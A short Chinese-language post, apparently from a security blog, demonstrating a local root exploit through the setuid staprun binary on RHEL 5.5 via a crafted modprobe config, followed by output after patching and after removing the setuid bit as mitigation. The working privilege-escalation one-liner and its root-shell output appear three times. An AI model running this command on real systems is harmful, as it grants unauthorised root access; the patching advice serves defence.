linux命令:
[b@fuckks~]$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTI*****="-C exploit.conf" staprun -u whatever
sh-3.2# uname -a
Linux xlsec 2.6.18-194.el5 #1 SMP Tue Mar 16 21:52:43 EDT 2010 i686 i686 i386 GNU/Linux
sh-3.2# cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
sh-3.2#
去打补丁吧,补上补丁之后的效果如下:
[b@fuckks~]$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTI*****="-C exploit.conf" staprun -u whatever
-bash: /usr/bin/staprun: Permission denied
[b@fuckks~]$
linux批量打补丁)没有补丁的,把/usr/bin/staprun这个东西的s位去掉,也可以应付的哦,如下:
[a@fuckks2~]$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTI*****="-C exploit.conf" staprun -u whatever
ERROR: The effective user ID of staprun must be set to the root user.
Check permissi***** on staprun and ensure it is a setuid root program.
[a@fuckks2~]$
注:此类漏洞常被不少用于web注入的木马以达到快速提权侵占系统的目的